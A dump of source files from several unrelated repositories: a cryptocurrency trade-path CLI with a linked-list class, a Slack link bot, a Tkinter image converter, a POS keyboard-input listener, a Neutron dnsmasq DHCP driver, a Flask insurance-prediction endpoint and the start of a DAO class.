price = ''
for val in priceSplit:
price += val
assets.addAsset(row[1].strip(), row[2].strip(), row[4].strip(), price, circulatingSupply.strip(), volume, row[9][:-1].strip(), row[10][:-1].strip(), row[11][:-1].strip())
# Function to load the trade data
def loadTradeData():
for data in exchange_data['symbols']:
baseAsset = data['baseAsset']
quoteAsset = data['quoteAsset']
status = data['status']
if not graph.hasVertex(baseAsset):
graph.addVertex(baseAsset, 0)
if not graph.hasVertex(quoteAsset):
graph.addVertex(quoteAsset, 0)
graph.addEdge(baseAsset, quoteAsset, status)
for data in trade_data:
tradeName = data['symbol']
tradeEdge = graph.getTradeEdge(tradeName)
priceChange = data['priceChange']
priceChangePercent = data['priceChangePercent']
volume = data['volume']
count = data['count']
weightedAvgPrice = data['weightedAvgPrice']
quoteVolume = data['quoteVolume']
lowPrice = data['lowPrice']
highPrice = data['highPrice']
openPrice = data['openPrice']
# Adding data to the edge class
tradeEdge.setVolume(volume)
tradeEdge.setPriceChange(priceChange)
tradeEdge.setPriceChangePercent(priceChangePercent)
tradeEdge.setQuoteVolume(quoteVolume)
tradeEdge.setLowPrice(lowPrice)
tradeEdge.setHighPrice(highPrice)
tradeEdge.setOpenPrice(openPrice)
tradeEdge.setCount(count)
tradeEdge.setWeightedAvgPrice(weightedAvgPrice)
# Function to show the data loading options
def getLoadOptions():
choice = 0
while(choice != 4):
print('\n(1) Asset data\n(2) Trade data\n(3) Serialised Data\n(4) Exit')
choice = int(input())
if choice == 1:
loadAssetData()
print('Asset data has been loaded')
elif choice == 2:
loadTradeData()
print('Trade data has been loaded')
elif choice == 3:
readFromSerializedFile()
elif choice == 4:
print('Exitting to the main menu\n')
else:
print('Wrong input, please try again\n')
# Function to display details related to the trade
def displayTradeDetails():
# Getting the input from the user
print("Input the trade name")
tradeName = input()
# Checking if trade edge exists
if graph.hasTradeEdge(tradeName):
graphEdge = graph.getTradeEdge(tradeName)
# Getting the two assets
baseAsset = graphEdge.getFromVertex()
quoteAsset = graphEdge.getToVertex()
# Displaying the trade details
print(f'\n{tradeName}')
print('\nStatus :', graphEdge.getStatus())
if graphEdge.getStatus() == 'TRADING':
print('24H Price :', graphEdge.getWeightedAvgPrice())
print(f'24H Price Change :', graphEdge.getPriceChange())
print(f'24H Price Change Percent :{graphEdge.getPriceChangePercent()}%')
print(f'24H High Price :', graphEdge.getHighPrice())
print(f'24H Low Price :', graphEdge.getLowPrice())
print(f'24H Volume ({baseAsset.getLabel()}) : {graphEdge.getVolume()}')
print(f'24H Volume ({quoteAsset.getLabel()}) : {graphEdge.getQuoteVolume()}')
print(f'24H Count :', graphEdge.getCount())
else:
print('No data as there is no trading')
else:
print("Trade doesn't exist")
# Function to display the details related to the asset
def displayAssetDetails():
print("Input the asset name")
assetName = input()
if assets.hasAsset(assetName):
asset = assets.getAsset(assetName)
print(f'\n{assetName}')
print('Name:', asset.getName())
print('Market Cap:', asset.getMarketCap())
print('Price:', asset.getPrice())
print('Circulating Supply:', asset.getCirculatingSupply())
print('Volume:', asset.getVolume())
print('One Hour Percent:'+asset.getOneHourPercent()+'%')
print('Twenty Four Hour Percent:'+asset.getTwentyFourHourPercent()+'%')
print('Seven Day Percent:'+asset.getSevenDayPercent()+'%')
else:
print("\nAsset doesn't exist\n")
# Function to compute and display the trade paths
def displayTradePaths():
# getting the base asset and quote asset from the user
print("Enter the base asset")
baseAsset = input()
print("Enter the quote asset")
quoteAsset = input()
# Getting the trade list
exchangeResults = graph.getTradeDetails(baseAsset, quoteAsset)
# Displaying the trade paths if present, else displaying no trade paths
if exchangeResults.size == 0:
print('\nNo Trade Paths\n')
else:
print("\nTrade paths\n")
bestPath = exchangeResults[2].head
print("Best Trade Path: ", end=' ')
while(bestPath != None):
print(bestPath.getValue(), end=' ')
bestPath = bestPath.getNext()
print()
print("Best Overall Exchange: ", exchangeResults[3])
print("\nAll the paths\n")
tradePath = exchangeResults[0].head
exchangePath = exchangeResults[1].head
while(tradePath != None):
trade = tradePath.getValue().head
print("Path:", end=' ')
while(trade != None):
print(trade.getValue(), end=' ')
trade = trade.getNext()
print()
print('Exchange: ', exchangePath.getValue())
tradePath = tradePath.getNext()
exchangePath = exchangePath.getNext()
# Function to read from serialized file
def readFromSerializedFile():
try:
with open('serializedCrytoGraph.txt', 'rb') as dataFile:
#loading the file
inGraph = pickle.load(dataFile)
graph = inGraph
print("Graph has been read from the Serialized File")
except:
print("Error: object file does not exist")
# Function to write to file with serialization
def writeToSerializedFile():
try:
# Writing in the serialized file
with open('serializedCrytoGraph.txt', 'wb') as dataFile:
pickle.dump(graph, dataFile)
print('Graph has been written into the serialized file')
except:
print("Error: problem pickling object!")
# Function to filter an asset
def assetFilter():
choice = 0
# Getting the input from the user
print('\nEnter 1 for including an asset and 2 for ignoring an asset')
while(choice != 1 and choice != 2):
choice = int(input())
if choice!= 1 and choice!= 2:
print('Wrong input, please try again\n')
print('Enter the asset name')
asset = input()
if choice == 1:
# checking if the asset is already present, else adding it back
if graph.hasVertex(asset):
print(f'{asset} already present in the graph')
else:
graph.addAsset(asset)
assets.addBackAsset(asset)
print(f'{asset} has been included in the graph')
else:
# ignoring the asset and its edges if it is present in the graph
if graph.hasVertex(asset):
graph.ignoreAsset(asset)
assets.ignoreAsset(asset)
print(f'{asset} has been ignored from the graph')
else:
print(f'{asset} already ignored from the graph')
# Entering the interactive mode
if args['interactive']:
# declaring the graph object
graph = DSAGraph()
# declaring the asset object
assets = AssetObject()
asset_file = open('asset_info.csv')
# Reading the csv
asset_data = csv.reader(asset_file)
# Reading trade files and converting to json
tradeFile = open('trade_file.json')
exchangeFile = open('asset_file.json')
trade_data = json.load(tradeFile)
exchange_data = json.load(exchangeFile)
# selecting the choice from the menu driven options
choice = 0
while(choice != 9):
print('\n----------Trade Menu----------\n(1) Load Data\n\t-Asset data\n\t-Trade data\n\t-Serialised Data\n(2) Find and display asset\n(3) Find and display trade details\n(4) Find and display potential trade paths\n(5) Set asset filter\n(6) Asset overview\n(7) Trade overview\n(8) Save data (serialised)\n(9) Exit')
choice = int(input())
if choice == 1:
getLoadOptions()
elif choice == 2:
displayAssetDetails()
elif choice == 3:
displayTradeDetails()
elif choice == 4:
displayTradePaths()
elif choice == 5:
assetFilter()
elif choice == 6:
assets.getAssetOverview()
elif choice == 7:
graph.getTradeOverview()
elif choice == 8:
writeToSerializedFile()
elif choice == 9:
print('Goodbye')
else:
print('\nInvalid choice, please try again')
# Entering the report mode
elif args['report']:
# declaring the graph object
graph = DSAGraph()
# declaring the assets object
assets = AssetObject()
asset_file = open('asset_info.csv')
# Reading the csv
asset_data = csv.reader(asset_file)
# reading the file and converting to json
tradeFile = open(args['report'][1])
exchangeFile = open(args['report'][0])
trade_data = json.load(tradeFile)
exchange_data = json.load(exchangeFile)
loadAssetData()
loadTradeData()
print("\nAsset Overview")
assets.getAssetOverview()
print("\nTrade Overview")
graph.getTradeOverview()
# Showing the usage information
else:
ap.print_help(sys.stderr)
sys.exit(1)
```
#### File: jobymathew/Cryptocurrency_Trade_Details_and_Overview/LinkedList.py
```python
import numpy as np
#Linked List Node Class
class DSAListNode():
"""
* Default Constructor.
* IMPORT: inValue (Object).
* EXPORT: none.
* ASSERTION: value intialized as inValue, next and prev set as none.
"""
def __init__(self,inValue):
self.value = inValue
self.next = None
self.prev = None
"""
* METHOD: getValue.
* IMPORT: none.
* EXPORT: value (Object).
* ASSERTION: none.
"""
def getValue(self):
return self.value
"""
* METHOD: setValue.
* IMPORT: inValue (Object).
* EXPORT: value.
* ASSERTION: none.
"""
def setValue(self,inValue):
self.value = inValue
"""
* METHOD: getNext.
* IMPORT: none.
* EXPORT: next (DSAListNode).
* ASSERTION: none.
"""
def getNext(self):
return self.next
"""
* METHOD: getPrev.
* IMPORT: none.
* EXPORT: prev (DSAListNode).
* ASSERTION: none.
"""
def getPrev(self):
return self.prev
"""
* METHOD: setNext.
* IMPORT: newNext (DSAListNode).
* EXPORT: none.
* ASSERTION: none.
"""
def setNext(self,newNext):
self.next = newNext
"""
* METHOD: setPrev.
* IMPORT: newPrev (DSAListNode).
* EXPORT: none.
* ASSERTION: none.
"""
def setPrev(self,newPrev):
self.prev = newPrev
#Linked List implementation class
class DSALinkedList():
head = DSAListNode(None)
tail = DSAListNode(None)
"""
* Default Constructor.
* IMPORT: none.
* EXPORT: none.
* ASSERTION: head and tail intialized as none.
"""
def __init__(self):
self.head = None
self.tail = None
"""
* METHOD: isEmpty.
* IMPORT: none.
* EXPORT: none.
* USAGE: check if the list is empty.
"""
def isEmpty(self):
return self.head == None
"""
* METHOD: insertFirst.
* IMPORT: none.
* EXPORT: none.
* USAGE: Inserting into the top of the list.
"""
def insertFirst(self,newValue):
newNd = DSAListNode(newValue)
if self.isEmpty():
self.head = newNd
self.head.setNext(None)
self.head.setPrev(None)
self.tail = newNd
self.tail.setPrev(None)
self.tail.setNext(None)
else:
newNd.setNext(self.head)
self.head.setPrev(newNd)
self.head = newNd
"""
* METHOD: insertLast.
* IMPORT: none.
* EXPORT: none.
* USAGE: Inserting into the bottom of the list.
"""
def insertLast(self, newValue):
newNd = DSAListNode(newValue)
if self.isEmpty():
self.head = newNd
self.tail = newNd
else:
self.tail.setNext(newNd)
newNd.setPrev(self.tail)
self.tail = newNd
"""
* METHOD: peekFirst.
* IMPORT: none.
* EXPORT: none.
* USAGE: Returns the first element of the list.
"""
def peekFirst(self):
retVal = None
if not self.isEmpty():
retVal = self.head.getValue()
return retVal
"""
* METHOD: peekLast.
* IMPORT: none.
* EXPORT: none.
* USAGE: Returns the last element of the list.
"""
def peekLast(self):
retVal = None
if not self.isEmpty():
retVal = self.tail.getValue()
return retVal
"""
* METHOD: removeFirst.
* IMPORT: none.
* EXPORT: none.
* USAGE: Removes the first element of the list.
"""
def removeFirst(self):
if not self.isEmpty():
if self.head.getNext() == None:
rmNd = self.head.getValue()
self.head = None
else:
rmNd = self.head.getValue()
self.head = self.head.getNext()
self.head.setPrev(None)
"""
* METHOD: removeLast.
* IMPORT: none.
* EXPORT: none.
* USAGE: Removes the last element of the list.
"""
def removeLast(self):
if not self.isEmpty():
rmNd = self.tail.getValue()
self.tail = self.tail.getPrev()
self.tail.setNext(None)
"""
* METHOD: remove.
* IMPORT: inValue (Object).
* EXPORT: none.
* USAGE: Removes the given element from the list.
"""
def remove(self, inValue):
if not self.isEmpty():
if self.head.getValue() == inValue:
self.head = self.head.getNext()
rmNd = self.head
while(rmNd.getNext() != None and rmNd.getValue() != inValue):
prevNd = rmNd
rmNd = rmNd.getNext()
if rmNd.getValue() == inValue:
prevNd.setNext(prevNd.getNext().getNext())
if prevNd.getNext() != None:
prevNd.getNext().setPrev(prevNd)
"""
* METHOD: iter.
* IMPORT: none.
* EXPORT: none.
* USAGE: iteration.
"""
def __iter__(self):
self.cur = self.head
return self
"""
* METHOD: next.
* IMPORT: none.
* EXPORT: none.
* USAGE: returns next value of iteration.
"""
def __next__(self):
i = 1
currNd = None
if self.cur == None:
print("The list is empty")
else:
currNd = self.cur.getValue()
print(currNd)
self.cur = self.cur.getNext()
"""
* METHOD: display.
* IMPORT: none.
* EXPORT: none.
* USAGE: displaying the values in the list.
"""
def display(self):
currNd = self.head
while(currNd != None):
print(currNd.getValue(), end=' ')
currNd = currNd.getNext()
print()
"""
* METHOD: listOfValues.
* IMPORT: none.
* EXPORT: none.
* USAGE: returns the values in the list as an array.
"""
def listOfValues(self):
size = self.count()
rtnList = np.empty(size, dtype=object)
currNd, i = self.head, 0
if not (self.isEmpty()):
while(currNd != None):
rtnList[i] = currNd.getValue()
i += 1
currNd = currNd.getNext()
return rtnList
"""
* METHOD: hasNode.
* IMPORT: value (Object).
* EXPORT: none.
* USAGE: check if the element exists in the list.
"""
def hasNode(self, value):
isFound = False
currNd = self.head
if not(self.isEmpty()):
while(currNd != None):
if currNd.getValue() == value:
isFound = True
currNd = currNd.getNext()
return isFound
"""
* METHOD: find.
* IMPORT: value (Object).
* EXPORT: none.
* USAGE: find an element in the list.
"""
def find(self, value):
retrunValue = None
if not(self.isEmpty()):
currNd = self.head
while(currNd != None):
if currNd.getValue() == value:
retrunValue = currNd.getValue()
currNd = currNd.getNext()
return retrunValue
"""
* METHOD: count.
* IMPORT: none.
* EXPORT: none.
* USAGE: count of elements in the list.
"""
def count(self):
c = 0
currNd = self.head
if not(self.isEmpty()):
while(currNd != None):
c += 1
currNd = currNd.getNext()
return c
``` |
{
"source": "jobywalker/linkbot",
"score": 3
} |
#### File: jobywalker/linkbot/app.py
```python
import logconfig # noqa F401
from flask import Flask, request, jsonify, abort
import slack
import os
import time
import hmac
import hashlib
from functools import partial
from threading import Thread
from queue import Queue
from linkbot import bots, RequestLogger
app = Flask(__name__)
app.config.from_pyfile(os.environ['APP_CONFIG'])
SLACK_SECRET = app.config['SLACK_SIGNING_SECRET']
LINKBOTS = []
for bot in app.config['LINKBOTS']:
LINKBOTS.append(getattr(bots, bot.get('LINK_CLASS', 'LinkBot'))(bot))
if not LINKBOTS:
raise Exception('no linkbots defined')
SLACK_CLIENT = slack.WebClient(app.config['SLACK_BOT_TOKEN'])
WEBHOOK_CLIENT = RequestLogger()
@app.route('/', methods=['GET', 'POST'])
def handle_message():
"""A single endpoint handling both events and commands."""
if request.method == 'GET':
return jsonify(success=True) # to pass a health check
verify_slack_signature()
if not request.is_json:
MessageProcessor.queue.put(partial(process_command, request.form))
return jsonify(response_type='in_channel')
json = request.get_json()
if 'challenge' in json:
# This is how Slack verifies our URL to receive events.
return jsonify(challenge=json['challenge'])
event = json['event']
MessageProcessor.queue.put(partial(process_event, event))
return '', 200
def verify_slack_signature():
"""
Verify a slack signature according to
https://api.slack.com/docs/verifying-requests-from-slack
"""
if app.debug:
return
timestamp = request.headers['X-Slack-Request-Timestamp']
signature = request.headers['X-Slack-Signature']
if time.time() - int(timestamp) > 5 * 60:
app.logger.error('Stale command request.')
abort(403)
compstr = f'v0:{timestamp}:'.encode() + request.get_data()
rhash = hmac.new(SLACK_SECRET.encode(), compstr, hashlib.sha256)
rhash = rhash.hexdigest()
if not hmac.compare_digest(f'v0={rhash}', signature):
app.logger.error('Invalid X-Slack-Signature')
abort(403)
class MessageProcessor(Thread):
queue = Queue()
def run(self):
"""Pull messages off the queue and process them."""
while True:
func = self.queue.get()
try:
func()
except Exception as e:
app.logger.exception(e)
self.queue.task_done()
def process_event(event):
"""Process events by posting matches to the provided channel."""
event_type = event.get('type')
subtype = event.get('subtype')
hidden = event.get('hidden')
if event_type != 'message':
app.logger.error(f'discarding unhandled event type {event_type}')
return
if 'bot_id' in event or subtype == 'bot_message':
return
event_keys = ','.join(event)
description = f'subtype={subtype};hidden={hidden}, {event_keys}'
if hidden or 'text' not in event or 'channel' not in event:
app.logger.info(f'Event discarded: {description}')
return
text = event['text']
post_args = {'channel': event['channel']}
if 'thread_ts' in event:
post_args['thread_ts'] = event['thread_ts']
app.logger.debug(f'processing message from event: {description}')
for message in links_from_text(text):
SLACK_CLIENT.chat_postMessage(text=message, **post_args)
def process_command(command):
"""Process a slack command by posting a response to the provided url."""
response_url = command.get('response_url')
text = command.get('text')
if not all([text, response_url]):
command_keys = ','.join(command)
app.logger.error(f'tossing supposed command: {command_keys}')
return
text = '\n'.join(links_from_text(text))
if text:
data = dict(text=text, response_type='in_channel')
WEBHOOK_CLIENT.post(response_url, json=data)
def links_from_text(text):
"""Search for matches and post any to the original channel."""
for bot in LINKBOTS:
for match in bot.match(text):
app.logger.info(f'{match} match!')
try:
yield bot.message(match)
except KeyError as e:
app.logger.info(f'not found on {match}: {e}')
except Exception as e:
app.logger.error(e)
continue
for _ in range(4):
MessageProcessor().start()
```
#### File: linkbot/linkbot/bots.py
```python
import re
import random
from . import clients
from datetime import datetime
class LinkBot(object):
"""Implements Slack message matching and link response
"""
QUIPS = [
'%s',
'linkbot noticed a link! %s',
'Oh, here it is... %s',
'Maybe this, %s, will help?',
'Click me! %s',
'Click my shiny metal link! %s',
'Here, let me link that for you... %s',
'Couldn\'t help but notice %s was mentioned...',
'Not that I was eavesdropping, but did you mention %s?',
'hmmmm, did you mean %s?',
'%s... Mama said there\'d be days like this...',
'%s? An epic, yet approachable tale...',
'%s? Reminds me of a story...',
]
default_match = r'_THIS_COULD_BE_OVERRIDDEN_'
def __init__(self, conf):
self._conf = conf
match = conf.get('MATCH', self.default_match)
self._regex = re.compile(r'(\A|\s)+(%s)' % match, flags=re.I)
if 'QUIPS' in conf:
self.QUIPS = conf.get('QUIPS')
self._link = conf.get('LINK', '%s|%s')
self._seen = []
def match(self, text):
"""Return a set of unique matches for text."""
return set(match[1] for match in self._regex.findall(text))
def message(self, link_label):
return self._message_text(self._link % (link_label, link_label))
def reset(self):
self._seen = []
def _quip(self, link):
if not self.QUIPS:
return link
quip = random.choice(self.QUIPS)
return quip % link
def _message_text(self, link):
return self._quip(link)
def _escape_html(self, text):
escaped = {
'&': '&',
'<': '<',
'>': '>',
}
return "".join(escaped.get(c, c) for c in text)
class JiraLinkBot(LinkBot):
"""Subclass LinkBot to customize response for JIRA links
"""
default_match = r'[A-Z]{3,}\-[0-9]+'
def __init__(self, conf):
if 'LINK' not in conf:
conf['LINK'] = '<{}/browse/%s|%s>'.format(conf['HOST'])
super(JiraLinkBot, self).__init__(conf)
self.jira = clients.UwSamlJira(host=conf.get('HOST'),
auth=conf.get('AUTH'))
@staticmethod
def pretty_update_time(issue):
updated = issue.fields.updated
try:
update_dt = datetime.strptime(updated, '%Y-%m-%dT%H:%M:%S.%f%z')
updated = update_dt.strftime("%Y-%m-%d %H:%M:%S")
except Exception:
pass
return updated
def message(self, link_label):
msg = super(JiraLinkBot, self).message(link_label)
issue = self.jira.issue(link_label)
summary = issue.fields.summary
def get_name(person): return person and person.displayName or 'None'
reporter = '*Reporter* ' + get_name(issue.fields.reporter)
assignee = '*Assignee* ' + get_name(issue.fields.assignee)
status = '*Status* ' + issue.fields.status.name
updated = '*Last Update* ' + self.pretty_update_time(issue)
lines = list(map(self._escape_html,
[summary, reporter, assignee, status, updated]))
return '\n> '.join([msg] + lines)
class ServiceNowBot(LinkBot):
_ticket_regex = '|'.join(clients.ServiceNowClient.table_map)
default_match = '(%s)[0-9]{7,}' % _ticket_regex
def __init__(self, conf):
super(ServiceNowBot, self).__init__(conf)
self.client = clients.ServiceNowClient(
host=conf.get('HOST'), auth=conf.get('AUTH'))
def message(self, link_label):
record = self.client.get_number(link_label)
link = self._strlink(link_label)
lines = [self._quip(link)]
for key, value in record.items(pretty_names=True):
if key == 'Subject':
lines.append(value or 'No subject')
elif key == 'Parent' and value:
link = self._strlink(value)
lines.append('*{key}* {link}'.format(key=key, link=link))
elif value and key != 'Number':
lines.append('*{key}* {value}'.format(key=key, value=value))
return '\n> '.join(lines)
def _strlink(self, link_label):
link = self.client.link(link_label)
return '<{link}|{label}>'.format(link=link, label=link_label)
```
#### File: linkbot/linkbot/__init__.py
```python
import requests
import time
from logging import getLogger
logger = getLogger(__name__)
class RequestLogger(requests.Session):
default_timeout = 15
def request(self, method, url, *args, **kwargs):
start_time = time.time()
response = None
kwargs.setdefault('timeout', self.default_timeout)
try:
response = super().request(method, url, *args, **kwargs)
finally:
elapsed = time.time() - start_time
status = response.status_code
logger.info(f'{method} {url} {status} {elapsed:0.3f}')
return response
``` |
{
"source": "JOC61/image-type-changer",
"score": 3
} |
#### File: image-type-changer/src/main.py
```python
import tkinter as tk, os
from PIL import Image
# Set image path to the current directory wherever you are
imageDirname = os.path.dirname(__file__)
imagePath = os.path.join(imageDirname, 'images to change/')
# Set asset path to the current directory wherever you are
assetDirname = os.path.dirname(__file__)
assetPath = os.path.join(imageDirname, 'assets/')
def change(endFormat, preserveAlpha):
f = []
for (dirpath, dirnames, filenames) in os.walk(imagePath):
f.extend(filenames)
j = 0
for x in filenames:
# Get rid of the last . and whatever is past it
file = filenames[j]
splitat = file.rfind('.') + 1
r = file[splitat:]
file = file[:-len(r)]
# Opem that image
im = Image.open(imagePath + filenames[j])
if preserveAlpha == True:
im.convert('RGBA').save(imagePath + file + endFormat.lower(), endFormat)
if preserveAlpha == False:
im.convert('RGB').save(imagePath + file + endFormat.lower(), endFormat)
j += 1
break
# Make the window and set window name
root = tk.Tk(className = 'image changer')
# Set background color
root.configure(bg ='#232323')
# Set window size
root.geometry('200x100')
# Make unable to be resized
root.resizable(False, False)
# Set icon
root.iconphoto(False, tk.PhotoImage(file = assetPath + 'icon.png'))
# Set the list of file types to transfer between
optionsList = [
'PNG',
'JPEG',
'ICO',
'WEBP',
'TIFF',
'BMP'
]
# Make StringVar() for the label of the dropdown
optionVariable = tk.StringVar()
optionVariable.set(optionsList[0])
# Make labels
lblTo = tk.Label(text = 'to', bg = '#232323', fg = '#E16D00')
# Make dropdown for all the different options
opt = tk.OptionMenu(root, optionVariable, *optionsList)
opt.config(bg = '#E16D00', fg = 'BLACK')
opt['highlightthickness']=0
opt['menu'].config(bg='#E16D00', fg = 'BLACK')
# Make buttons
#if optionVariable.get() == 'PNG' or optionVariable.get() == 'ICO' or optionVariable.get() == 'WEBP' or optionVariable.get() == 'TIFF' or optionVariable.get() == 'BMP':
btnConvert = tk.Button(text = 'Convert (preserve alpha)', bg = '#E16D00', fg = 'BLACK', command = lambda: change(optionVariable.get(), True))
btnConvertNoAlpha = tk.Button(text = "Convert (don't preserve alpha)", bg = '#E16D00', fg = 'BLACK', command = lambda: change(optionVariable.get(), False))
# Stick all the stuff in the window
lblTo.grid(row = 0, column = 0)
opt.grid(row = 0, column = 1)
btnConvert.grid(row = 1, column = 1)
btnConvertNoAlpha.grid(row = 2, column = 1)
# Run mainloop to actually have the window
root.mainloop()
``` |
{
"source": "jocado/networking-calico",
"score": 2
} |
#### File: agent/linux/dhcp.py
```python
import copy
import netaddr
import os
import re
import sys
import time
from neutron.agent.linux import dhcp
from oslo_log import log as logging
from networking_calico.compat import constants
LOG = logging.getLogger(__name__)
class DnsmasqRouted(dhcp.Dnsmasq):
"""Dnsmasq DHCP driver for routed virtual interfaces."""
def __init__(self, conf, network, process_monitor,
version=None, plugin=None):
super(DnsmasqRouted, self).__init__(conf, network, process_monitor,
version, plugin)
self.device_manager = CalicoDeviceManager(self.conf, plugin)
# Frozen copy of Dnsmasq::_build_cmdline_callback from
# neutron/agent/linux/dhcp.py in Neutron 13.0.2.
def neutron_13_0_2_build_cmdline_callback(self, pid_file):
# We ignore local resolv.conf if dns servers are specified
# or if local resolution is explicitly disabled.
_no_resolv = (
'--no-resolv' if self.conf.dnsmasq_dns_servers or
not self.conf.dnsmasq_local_resolv else '')
cmd = [
'dnsmasq',
'--no-hosts',
_no_resolv,
'--except-interface=lo',
'--pid-file=%s' % pid_file,
'--dhcp-hostsfile=%s' % self.get_conf_file_name('host'),
'--addn-hosts=%s' % self.get_conf_file_name('addn_hosts'),
'--dhcp-optsfile=%s' % self.get_conf_file_name('opts'),
'--dhcp-leasefile=%s' % self.get_conf_file_name('leases'),
'--dhcp-match=set:ipxe,175',
]
if self.device_manager.driver.bridged:
cmd += [
'--bind-interfaces',
'--interface=%s' % self.interface_name,
]
else:
cmd += [
'--bind-dynamic',
'--interface=%s' % self.interface_name,
'--interface=tap*',
'--bridge-interface=%s,tap*' % self.interface_name,
]
possible_leases = 0
for i, subnet in enumerate(self._get_all_subnets(self.network)):
mode = None
# if a subnet is specified to have dhcp disabled
if not subnet.enable_dhcp:
continue
if subnet.ip_version == 4:
mode = 'static'
else:
# Note(scollins) If the IPv6 attributes are not set, set it as
# static to preserve previous behavior
addr_mode = getattr(subnet, 'ipv6_address_mode', None)
ra_mode = getattr(subnet, 'ipv6_ra_mode', None)
if (addr_mode in [constants.DHCPV6_STATEFUL,
constants.DHCPV6_STATELESS] or
not addr_mode and not ra_mode):
mode = 'static'
cidr = netaddr.IPNetwork(subnet.cidr)
if self.conf.dhcp_lease_duration == -1:
lease = 'infinite'
else:
lease = '%ss' % self.conf.dhcp_lease_duration
# mode is optional and is not set - skip it
if mode:
if subnet.ip_version == 4:
cmd.append('--dhcp-range=%s%s,%s,%s,%s,%s' %
('set:', self._TAG_PREFIX % i,
cidr.network, mode, cidr.netmask, lease))
else:
if cidr.prefixlen < 64:
LOG.debug('Ignoring subnet %(subnet)s, CIDR has '
'prefix length < 64: %(cidr)s',
{'subnet': subnet.id, 'cidr': cidr})
continue
cmd.append('--dhcp-range=%s%s,%s,%s,%d,%s' %
('set:', self._TAG_PREFIX % i,
cidr.network, mode,
cidr.prefixlen, lease))
possible_leases += cidr.size
mtu = getattr(self.network, 'mtu', 0)
# Do not advertise unknown mtu
if mtu > 0:
cmd.append('--dhcp-option-force=option:mtu,%d' % mtu)
# Cap the limit because creating lots of subnets can inflate
# this possible lease cap.
cmd.append('--dhcp-lease-max=%d' %
min(possible_leases, self.conf.dnsmasq_lease_max))
try:
if self.conf.dhcp_renewal_time > 0:
cmd.append('--dhcp-option-force=option:T1,%ds' %
self.conf.dhcp_renewal_time)
except AttributeError:
pass
try:
if self.conf.dhcp_rebinding_time > 0:
cmd.append('--dhcp-option-force=option:T2,%ds' %
self.conf.dhcp_rebinding_time)
except AttributeError:
pass
cmd.append('--conf-file=%s' % self.conf.dnsmasq_config_file)
for server in self.conf.dnsmasq_dns_servers:
cmd.append('--server=%s' % server)
try:
if self.dns_domain:
cmd.append('--domain=%s' % self.dns_domain)
except AttributeError:
pass
if self.conf.dhcp_broadcast_reply:
cmd.append('--dhcp-broadcast')
if self.conf.dnsmasq_base_log_dir:
log_dir = os.path.join(
self.conf.dnsmasq_base_log_dir,
self.network.id)
try:
if not os.path.exists(log_dir):
os.makedirs(log_dir)
except OSError:
LOG.error('Error while create dnsmasq log dir: %s', log_dir)
else:
log_filename = os.path.join(log_dir, 'dhcp_dns_log')
cmd.append('--log-queries')
cmd.append('--log-dhcp')
cmd.append('--log-facility=%s' % log_filename)
return cmd
def _build_cmdline_callback(self, pid_file):
cmd = self.neutron_13_0_2_build_cmdline_callback(pid_file)
# Replace 'static' by 'static,off-link' in all IPv6
# --dhcp-range options.
prog = re.compile('(--dhcp-range=set:[^,]+,[0-9a-f:]+),static,(.*)')
for option in copy.copy(cmd):
m = prog.match(option)
if m:
cmd.remove(option)
cmd.append(m.group(1) + ',static,off-link,' + m.group(2))
# Add '--enable-ra'.
cmd.append('--enable-ra')
# Enumerate precisely the TAP interfaces to listen on.
cmd.remove('--interface=tap*')
cmd.remove('--bridge-interface=%s,tap*' % self.interface_name)
bridge_option = '--bridge-interface=%s' % self.interface_name
for port in self.network.ports:
if port.device_id.startswith('tap'):
LOG.debug('Listen on %s', port.device_id)
cmd.append('--interface=%s' % port.device_id)
bridge_option = bridge_option + ',' + port.device_id
cmd.append(bridge_option)
return cmd
def _destroy_namespace_and_port(self):
try:
self.device_manager.destroy(self.network, self.interface_name)
except RuntimeError:
LOG.warning('Failed trying to delete interface: %s',
self.interface_name)
class CalicoDeviceManager(dhcp.DeviceManager):
"""Device manager for the default namespace that Calico operates in."""
def _set_default_route(self, network, device_name):
pass
def _cleanup_stale_devices(self, network, dhcp_port):
pass
def fill_dhcp_udp_checksums(self, *args, **kwargs):
retries = 10
while retries > 0:
try:
super(CalicoDeviceManager, self).fill_dhcp_udp_checksums(
*args, **kwargs)
except RuntimeError:
# fill_dhcp_udp_checksums() can fail transiently if iptables
# is modified concurrently, especially with an aggressive
# iptables writer such as Felix running.
LOG.exception("Failed to insert checksum rule, may retry...")
time.sleep(0.1)
retries -= 1
else:
LOG.debug("Inserted DHCP checksum rule.")
break
else:
LOG.error("Failed to insert DHCP checksum rule. Exiting...")
sys.exit(1)
``` |
{
"source": "jocafneto/Insurance-All-Cross-Sell",
"score": 3
} |
#### File: jocafneto/Insurance-All-Cross-Sell/handler.py
```python
from crypt import methods
import os
import pickle
import pandas as pd
import lightgbm
from flask import Flask, request, Response
from healthinsurance.HealthInsurance import HealthInsurance
# loading model
model = pickle.load( open( 'model/LGBM_Model.pkl', 'rb' ) )
# initialize API
app = Flask( __name__ )
@app.route( '/predict', methods=['POST'] )
def healthinsurance_predict():
test_json = request.get_json()
if test_json: # there is data
if isinstance( test_json, dict ): # unique exemple
test_raw = pd.DataFrame( test_json, index=[0] )
else: # multiple exemples
test_raw = pd.DataFrame( test_json, columns=test_json[0].keys() )
# Instantiate HealthInsurance Class
pipeline = HealthInsurance()
# data cleaning
df = pipeline.data_cleaning( test_raw )
# feature engineering
df = pipeline.feature_engineering( df )
# data preparation
df = pipeline.data_preparation( df )
# prediction
df_response = pipeline.get_prediction( model, test_raw, df )
return df_response
else:
return Response( '{}', status=200, mimetype='application/json')
if __name__ == '__main__':
port = os.environ.get( 'PORT', 5000 )
app.run( '0.0.0.0', port=port )
``` |
{
"source": "jocamill/pos-distillery",
"score": 3
} |
#### File: jocamill/pos-distillery/pos_kbinput.py
```python
from pynput import keyboard
def on_press(key):
# attempt to catch the hand scanner input and stack the str
try:
#print('alphanumeric key {0} pressed'.format(key.char))
print('Scanning DL *********************************')
except AttributeError:
print('special key {0} pressed'.format(
key))
if key == keyboard.Key.enter:
print('The ENTER was pressed')
def on_release(key):
# print('{0}'.format(key))
# inputstr = "" + '{0}'.format(key)
if key == keyboard.Key.esc:
# Stop listener
print('Exiting by command')
return False
# Collect events until released
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
def main():
def on
``` |
{
"source": "jocampo/url-shortener-demo",
"score": 3
} |
#### File: db/dao/shortened_url_dao.py
```python
from abc import ABC
from db.dao.abstract_dao import AbstractDAO
from db.models.base_model import BaseModel
from app.create_app import db
from db.models.shortened_url import ShortenedUrl
class ShortenedUrlDAO(AbstractDAO):
"""
Shortened URL DAO that contains specific operations for this entity type in the db
"""
@staticmethod
